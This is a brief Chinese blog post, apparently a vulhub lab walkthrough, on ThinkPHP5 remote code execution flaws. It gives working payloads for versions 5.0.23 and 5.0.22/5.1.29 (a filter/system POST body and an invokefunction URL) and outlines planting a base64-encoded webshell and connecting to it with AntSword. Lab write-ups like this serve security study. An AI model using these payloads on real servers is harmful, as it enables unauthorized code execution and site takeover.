thinkphp框架漏洞
thinkphp5 5.0.23 远程代码执行漏洞
进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动
使用hcakbar工具,构造payload,构造完毕后点击Execute
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
命令执行成功
使用phpinfo验证漏洞
写入一句话木马,一句话木马要进行base64编码
进入容器,查看木马文件是否写入
然后使用蚁剑连接
成功getshell
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
进入vulhub靶场。启动环境
http://192.168.116.166:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
代码执行成功说明存在远程代码执行漏洞
待更新
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探